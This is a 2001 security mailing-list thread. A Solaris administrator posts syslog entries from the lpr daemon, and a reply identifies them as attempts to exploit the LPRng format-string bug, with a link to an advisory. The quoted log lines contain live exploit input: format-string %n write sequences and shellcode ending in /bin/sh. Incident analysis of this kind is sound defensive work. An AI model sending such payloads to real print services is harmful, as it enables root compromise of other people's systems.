Security Incidents mailing list archives

RE: solaris hack info required

From: "Ivy Lane" <ivylane24 () hotmail com>
Date: Fri, 29 Jun 2001 13:22:48 -0400


This is called "trying to use LPR's logging function" to get a shell.

This is the LPRng string format _syslog bug that theoretically could allowroot access.

Read this:
http://www.securityfocus.com/vdb/bottom.html?vid=1712

Solaris 8 is not listed as vulnerable.

Give the man a peanut!


IN RESPONSE TO:
*******************************************
Hi,

Any help you can give me would be appreciated.

I've a Sun Netra X1 (Solaris 8) with a /var/adm/messages file full of these
messages at frequent but irregular intervals (approx every 5-10 seconds for
several hours).

Jun 24 03:43:02 jim bsd-gw[13276]: [ID 315218 lpr.error] Invalid protocol r
equest (66):
BBBXXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%30
3$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
Jun 24 03:43:03 jim bsd-gw[13277]: [ID 315218 lpr.error] Invalid protocol r
equest (66):
BBB()*+XXXXXXXXXXXXXXXXXX%.232u%300$n%.199u%301$nsecurity.i%302$n%.
192u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
Jun 24 03:43:03 jim bsd-gw[13278]: [ID 315218 lpr.error] Invalid protocol r
equest (66):
BBBHIJKXXXXXXXXXXXXXXXXXXsecurity%300$n%.167u%301$nsecurity.i%302$n
%.192u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
Jun 24 03:43:03 jim bsd-gw[13279]: [ID 315218 lpr.error] Invalid protocol r
equest (66):
BBBXXXXXXXXXXXXXXXXXX%.136u%300$n%.41u%301$nsecurity%302$n%.192u%30
3$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
Jun 24 03:43:04 jim bsd-gw[13280]: [ID 315218 lpr.error] Invalid protocol r
equest (66):
BBBXXXXXXXXXXXXXXXXXX%.72u%300$n%.106u%301$nsecurit%302$n%.192u%303
$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh

Do any of you recognise this? If so, what should I be looking for to see if
the hack was successful?

TIA,
Mark



----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see:

http://aris.securityfocus.com

_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com



----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.

For more information on this free incident handling, managementand tracking system please see:


http://aris.securityfocus.com

Current thread:

solaris hack info required Mark Hollow (Jun 29)
- RE: solaris hack info required Mike Batchelor (Jun 30)
- Re: solaris hack info required Devdas Bhagat (Jun 30)
- <Possible follow-ups>
- RE: solaris hack info required Ivy Lane (Jun 30)